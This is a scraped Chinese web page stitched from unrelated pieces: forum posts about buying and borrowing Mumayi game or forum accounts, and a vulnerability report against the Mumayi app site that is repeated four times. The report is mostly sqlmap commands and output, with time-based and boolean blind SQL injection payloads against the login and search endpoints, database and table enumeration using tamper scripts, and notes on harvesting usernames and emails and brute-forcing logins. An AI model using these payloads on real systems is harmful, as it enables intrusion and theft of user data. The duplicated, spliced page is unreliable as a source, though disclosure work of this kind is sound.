求木蚂蚁论坛帐号

回复:求木蚂蚁首充号平台_恋舞吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0可签7级以上的吧50个
本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:11,841贴子:
回复:求木蚂蚁首充号平台
没人知道吗
卖号,安卓九游首充号,...
白天忙事情,我一般通宵...
我也是醉了。
本来约好朋友打球的。喝...
看到好多玩家平台买号被...
18个五星符文全齐 背包...
说到做到!现在开始!
可以问我买
微信molingjin123
没人来告知下吗?给钱买还不行么
楼主买到号了么
内&&容:使用签名档&&
保存至快速回贴分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
详细说明:
之前的洞都补上了,但是问题还是有还是很类似的。
/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep&
code 区域sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
Place: POST
Parameter: usernm
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: usernm=1') AND SLEEP(5) AND ('aGgE'='aGgE&passwd=c4ca820dcc509a6f75849b&scopelist[]=basicinfo&scopelist[]=bbsinfo&client_id=100003&response_type=code&redirect_uri=/Homelogin/Callback&state=&scope=&display=&accept=Yep
[23:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep& --dbs
code 区域available databases [9]:
[*] information_schema
[*] mumayipay_mumayi
[*] performance_schema
[*] uc_mumayi
[*] ucenter
还是涉及用户库其他其他重要库
/index.php?q=1&typeid=0
搜索网站 也存在注入(q参数存在注入)
sqlmap -u &/index.php?q=1&typeid=0&
code 区域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: q
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%' AND
AND '%'='&typeid=0
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: q=1%' AND SLEEP(5) AND '%'='&typeid=0
[22:39:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/index.php?q=1&typeid=0& --dbs
code 区域available databases [1]:
[*] developer
sqlmap -u &/index.php?q=1&typeid=0&
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
code 区域[23:01:10] [INFO] retrieved:
[23:01:11] [WARNING] reflective value(s) found and filtering out
[23:01:20] [INFO] retrieved: market_cloudbackup
[23:03:38] [INFO] retrieved: mumayi_abgut
[23:05:04] [INFO] retrieved: mumayi_acl
[23:05:46] [INFO] retrieved: mumayi_ad`speclist
[23:07:25] [INFO] retrieved: mumayi_adlist
[23:08:14] [INFO] retrieved: mumayi_admi`
[23:08:53] [INFO] retrieved: mumayi_admi@_log
[23:09:49] [INFO] retrieved: mumayi_adpage
[23:10:42] [INFO] retrieved: mumayi_adposition
[23:11:49] [INFO] retrieved: mumayi_adsoft
[23:12:33] [INFO] retrieved: mumayi_arctype
[23:13:48] [INFO] retrieved: mumayi_arcsype_baks
[23:15:42] [INFO] retrieved: mumayi_baikan_focus
[23:18:00] [INFO] retrieved: mumayi_bbs2013
[23:19:15] [INFO] retrieved: mumayi_channel
[23:20:44] [INFO] retrieved: mumayi_ciry
[23:22:24] [INFO] retrieved: mumayi_district
[23:24:01] [INFO] retrieved: mumayi_downchalnel_day
[23:27:18] [INFO] retrieved: mumayi_downchannel_month
[23:29:48] [INFO] retrieved: mumayi_d\_year
[23:34:14] [INFO] retrieved: mumayi_download^Xpush
[23:36:48] [INFO] retrieved: _arctPpe
[23:39:02] [INFO] retrieved: mumayi_google_list
[23:40:22] [INFO] retrieved: mumayi_google_soft
[23:41:08] [INFO] retrieved: mumayi_member
[23:42:00] [INFO] retrieved: mumayi_member_ac`
[23:42:47] [INFO] retrieved: mumayi_member_log
[23:43:26] [INFO] retrieved: mumayi_member_repource
[23:44:35] [INFO] retrieved: mumayi_member_roje
[23:45:21] [INFO] retrieved: mumayi_menu
[23:45:58] [INFO] retrieved: mumayi_m`niank
[23:46:58] [INFO] retrieved: mumayi_minisoft
[23:48:09] [INFO] retrieved: mumayi_mpk_extension
[23:49:44] [INFO] retrieved: mumayi_mpk_focus
[23:50:32] [INFO] retrieved: mumayi_mpk_phonebrand
[23:51:50] [INFO] retrieved: mumayi_mpk_phoneinfo
[23:52:37] [INFO] retrieved: mumayi_mpk_phoneinfo_temp
[23:53:38] [INFO] retrieved: mumayi_notfce
[23:54:25] [INFO] retrieved: mumayi_online
[23:55:16] [INFO] retrieved: mumayi_pc_drive
[23:56:39] [INFO] retrieved:
[23:58:18] [INFO] retrieved: mumayi_pc_eqtip@
还有一个小问题 上次有说过
/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank
漏洞证明:
之前的洞都补上了,但是问题还是有还是很类似的。
/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep&
code 区域sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
Place: POST
Parameter: usernm
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: usernm=1') AND SLEEP(5) AND ('aGgE'='aGgE&passwd=c4ca820dcc509a6f75849b&scopelist[]=basicinfo&scopelist[]=bbsinfo&client_id=100003&response_type=code&redirect_uri=/Homelogin/Callback&state=&scope=&display=&accept=Yep
[23:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep& --dbs
code 区域available databases [9]:
[*] information_schema
[*] mumayipay_mumayi
[*] performance_schema
[*] uc_mumayi
[*] ucenter
还是涉及用户库其他其他重要库
/index.php?q=1&typeid=0
搜索网站 也存在注入(q参数存在注入)
sqlmap -u &/index.php?q=1&typeid=0&
code 区域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: q
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%' AND
AND '%'='&typeid=0
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: q=1%' AND SLEEP(5) AND '%'='&typeid=0
[22:39:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/index.php?q=1&typeid=0& --dbs
code 区域available databases [1]:
[*] developer
sqlmap -u &/index.php?q=1&typeid=0&
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
code 区域[23:01:10] [INFO] retrieved:
[23:01:11] [WARNING] reflective value(s) found and filtering out
[23:01:20] [INFO] retrieved: market_cloudbackup
[23:03:38] [INFO] retrieved: mumayi_abgut
[23:05:04] [INFO] retrieved: mumayi_acl
[23:05:46] [INFO] retrieved: mumayi_ad`speclist
[23:07:25] [INFO] retrieved: mumayi_adlist
[23:08:14] [INFO] retrieved: mumayi_admi`
[23:08:53] [INFO] retrieved: mumayi_admi@_log
[23:09:49] [INFO] retrieved: mumayi_adpage
[23:10:42] [INFO] retrieved: mumayi_adposition
[23:11:49] [INFO] retrieved: mumayi_adsoft
[23:12:33] [INFO] retrieved: mumayi_arctype
[23:13:48] [INFO] retrieved: mumayi_arcsype_baks
[23:15:42] [INFO] retrieved: mumayi_baikan_focus
[23:18:00] [INFO] retrieved: mumayi_bbs2013
[23:19:15] [INFO] retrieved: mumayi_channel
[23:20:44] [INFO] retrieved: mumayi_ciry
[23:22:24] [INFO] retrieved: mumayi_district
[23:24:01] [INFO] retrieved: mumayi_downchalnel_day
[23:27:18] [INFO] retrieved: mumayi_downchannel_month
[23:29:48] [INFO] retrieved: mumayi_d\_year
[23:34:14] [INFO] retrieved: mumayi_download^Xpush
[23:36:48] [INFO] retrieved: _arctPpe
[23:39:02] [INFO] retrieved: mumayi_google_list
[23:40:22] [INFO] retrieved: mumayi_google_soft
[23:41:08] [INFO] retrieved: mumayi_member
[23:42:00] [INFO] retrieved: mumayi_member_ac`
[23:42:47] [INFO] retrieved: mumayi_member_log
[23:43:26] [INFO] retrieved: mumayi_member_repource
[23:44:35] [INFO] retrieved: mumayi_member_roje
[23:45:21] [INFO] retrieved: mumayi_menu
[23:45:58] [INFO] retrieved: mumayi_m`niank
[23:46:58] [INFO] retrieved: mumayi_minisoft
[23:48:09] [INFO] retrieved: mumayi_mpk_extension
[23:49:44] [INFO] retrieved: mumayi_mpk_focus
[23:50:32] [INFO] retrieved: mumayi_mpk_phonebrand
[23:51:50] [INFO] retrieved: mumayi_mpk_phoneinfo
[23:52:37] [INFO] retrieved: mumayi_mpk_phoneinfo_temp
[23:53:38] [INFO] retrieved: mumayi_notfce
[23:54:25] [INFO] retrieved: mumayi_online
[23:55:16] [INFO] retrieved: mumayi_pc_drive
[23:56:39] [INFO] retrieved:
[23:58:18] [INFO] retrieved: mumayi_pc_eqtip@
还有一个小问题 上次有说过
/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:13
确认时间: 10:02
厂商回复:
感谢提醒,正在处理
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
详细说明:
之前的洞都补上了,但是问题还是有还是很类似的。
/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep&
code 区域sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
Place: POST
Parameter: usernm
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: usernm=1') AND SLEEP(5) AND ('aGgE'='aGgE&passwd=c4ca820dcc509a6f75849b&scopelist[]=basicinfo&scopelist[]=bbsinfo&client_id=100003&response_type=code&redirect_uri=/Homelogin/Callback&state=&scope=&display=&accept=Yep
[23:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep& --dbs
code 区域available databases [9]:
[*] information_schema
[*] mumayipay_mumayi
[*] performance_schema
[*] uc_mumayi
[*] ucenter
还是涉及用户库其他其他重要库
/index.php?q=1&typeid=0
搜索网站 也存在注入(q参数存在注入)
sqlmap -u &/index.php?q=1&typeid=0&
code 区域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: q
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%' AND
AND '%'='&typeid=0
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: q=1%' AND SLEEP(5) AND '%'='&typeid=0
[22:39:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/index.php?q=1&typeid=0& --dbs
code 区域available databases [1]:
[*] developer
sqlmap -u &/index.php?q=1&typeid=0&
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
code 区域[23:01:10] [INFO] retrieved:
[23:01:11] [WARNING] reflective value(s) found and filtering out
[23:01:20] [INFO] retrieved: market_cloudbackup
[23:03:38] [INFO] retrieved: mumayi_abgut
[23:05:04] [INFO] retrieved: mumayi_acl
[23:05:46] [INFO] retrieved: mumayi_ad`speclist
[23:07:25] [INFO] retrieved: mumayi_adlist
[23:08:14] [INFO] retrieved: mumayi_admi`
[23:08:53] [INFO] retrieved: mumayi_admi@_log
[23:09:49] [INFO] retrieved: mumayi_adpage
[23:10:42] [INFO] retrieved: mumayi_adposition
[23:11:49] [INFO] retrieved: mumayi_adsoft
[23:12:33] [INFO] retrieved: mumayi_arctype
[23:13:48] [INFO] retrieved: mumayi_arcsype_baks
[23:15:42] [INFO] retrieved: mumayi_baikan_focus
[23:18:00] [INFO] retrieved: mumayi_bbs2013
[23:19:15] [INFO] retrieved: mumayi_channel
[23:20:44] [INFO] retrieved: mumayi_ciry
[23:22:24] [INFO] retrieved: mumayi_district
[23:24:01] [INFO] retrieved: mumayi_downchalnel_day
[23:27:18] [INFO] retrieved: mumayi_downchannel_month
[23:29:48] [INFO] retrieved: mumayi_d\_year
[23:34:14] [INFO] retrieved: mumayi_download^Xpush
[23:36:48] [INFO] retrieved: _arctPpe
[23:39:02] [INFO] retrieved: mumayi_google_list
[23:40:22] [INFO] retrieved: mumayi_google_soft
[23:41:08] [INFO] retrieved: mumayi_member
[23:42:00] [INFO] retrieved: mumayi_member_ac`
[23:42:47] [INFO] retrieved: mumayi_member_log
[23:43:26] [INFO] retrieved: mumayi_member_repource
[23:44:35] [INFO] retrieved: mumayi_member_roje
[23:45:21] [INFO] retrieved: mumayi_menu
[23:45:58] [INFO] retrieved: mumayi_m`niank
[23:46:58] [INFO] retrieved: mumayi_minisoft
[23:48:09] [INFO] retrieved: mumayi_mpk_extension
[23:49:44] [INFO] retrieved: mumayi_mpk_focus
[23:50:32] [INFO] retrieved: mumayi_mpk_phonebrand
[23:51:50] [INFO] retrieved: mumayi_mpk_phoneinfo
[23:52:37] [INFO] retrieved: mumayi_mpk_phoneinfo_temp
[23:53:38] [INFO] retrieved: mumayi_notfce
[23:54:25] [INFO] retrieved: mumayi_online
[23:55:16] [INFO] retrieved: mumayi_pc_drive
[23:56:39] [INFO] retrieved:
[23:58:18] [INFO] retrieved: mumayi_pc_eqtip@
还有一个小问题 上次有说过
/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank
漏洞证明:
之前的洞都补上了,但是问题还是有还是很类似的。
/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep&
code 区域sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
Place: POST
Parameter: usernm
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: usernm=1') AND SLEEP(5) AND ('aGgE'='aGgE&passwd=c4ca820dcc509a6f75849b&scopelist[]=basicinfo&scopelist[]=bbsinfo&client_id=100003&response_type=code&redirect_uri=/Homelogin/Callback&state=&scope=&display=&accept=Yep
[23:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/oauth/?m=Oauth&a=authorize& --data &usernm=1&passwd=c4ca820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep& --dbs
code 区域available databases [9]:
[*] information_schema
[*] mumayipay_mumayi
[*] performance_schema
[*] uc_mumayi
[*] ucenter
还是涉及用户库其他其他重要库
/index.php?q=1&typeid=0
搜索网站 也存在注入(q参数存在注入)
sqlmap -u &/index.php?q=1&typeid=0&
code 区域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: q
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%' AND
AND '%'='&typeid=0
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: q=1%' AND SLEEP(5) AND '%'='&typeid=0
[22:39:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.21
back-end DBMS: MySQL 5.0.11
sqlmap -u &/index.php?q=1&typeid=0& --dbs
code 区域available databases [1]:
[*] developer
sqlmap -u &/index.php?q=1&typeid=0&
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
code 区域[23:01:10] [INFO] retrieved:
[23:01:11] [WARNING] reflective value(s) found and filtering out
[23:01:20] [INFO] retrieved: market_cloudbackup
[23:03:38] [INFO] retrieved: mumayi_abgut
[23:05:04] [INFO] retrieved: mumayi_acl
[23:05:46] [INFO] retrieved: mumayi_ad`speclist
[23:07:25] [INFO] retrieved: mumayi_adlist
[23:08:14] [INFO] retrieved: mumayi_admi`
[23:08:53] [INFO] retrieved: mumayi_admi@_log
[23:09:49] [INFO] retrieved: mumayi_adpage
[23:10:42] [INFO] retrieved: mumayi_adposition
[23:11:49] [INFO] retrieved: mumayi_adsoft
[23:12:33] [INFO] retrieved: mumayi_arctype
[23:13:48] [INFO] retrieved: mumayi_arcsype_baks
[23:15:42] [INFO] retrieved: mumayi_baikan_focus
[23:18:00] [INFO] retrieved: mumayi_bbs2013
[23:19:15] [INFO] retrieved: mumayi_channel
[23:20:44] [INFO] retrieved: mumayi_ciry
[23:22:24] [INFO] retrieved: mumayi_district
[23:24:01] [INFO] retrieved: mumayi_downchalnel_day
[23:27:18] [INFO] retrieved: mumayi_downchannel_month
[23:29:48] [INFO] retrieved: mumayi_d\_year
[23:34:14] [INFO] retrieved: mumayi_download^Xpush
[23:36:48] [INFO] retrieved: _arctPpe
[23:39:02] [INFO] retrieved: mumayi_google_list
[23:40:22] [INFO] retrieved: mumayi_google_soft
[23:41:08] [INFO] retrieved: mumayi_member
[23:42:00] [INFO] retrieved: mumayi_member_ac`
[23:42:47] [INFO] retrieved: mumayi_member_log
[23:43:26] [INFO] retrieved: mumayi_member_repource
[23:44:35] [INFO] retrieved: mumayi_member_roje
[23:45:21] [INFO] retrieved: mumayi_menu
[23:45:58] [INFO] retrieved: mumayi_m`niank
[23:46:58] [INFO] retrieved: mumayi_minisoft
[23:48:09] [INFO] retrieved: mumayi_mpk_extension
[23:49:44] [INFO] retrieved: mumayi_mpk_focus
[23:50:32] [INFO] retrieved: mumayi_mpk_phonebrand
[23:51:50] [INFO] retrieved: mumayi_mpk_phoneinfo
[23:52:37] [INFO] retrieved: mumayi_mpk_phoneinfo_temp
[23:53:38] [INFO] retrieved: mumayi_notfce
[23:54:25] [INFO] retrieved: mumayi_online
[23:55:16] [INFO] retrieved: mumayi_pc_drive
[23:56:39] [INFO] retrieved:
[23:58:18] [INFO] retrieved: mumayi_pc_eqtip@
还有一个小问题 上次有说过
/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:13
确认时间: 10:02
厂商回复:
感谢提醒,正在处理
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先哪位大侠有安智论坛、安卓论坛、木蚂蚁论坛的账号,要有发帖权限。求借用,绝不乱用._百度知道
哪位大侠有安智论坛、安卓论坛、木蚂蚁论坛的账号,要有发帖权限。求借用,绝不乱用.
侠,求借用.邮箱:
(#换@)工作需要,品保证,绝乱用.
我有更好的答案
自己注册就可以啊,估计大家有帐号的也不太乐意拿出来给你啊。还是自己去注册靠谱。
额,,,没去哪个论坛
其他类似问题
为您推荐:
安卓论坛的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁

我要回帖

更多关于 木蚂蚁社区论坛 的文章

 

随机推荐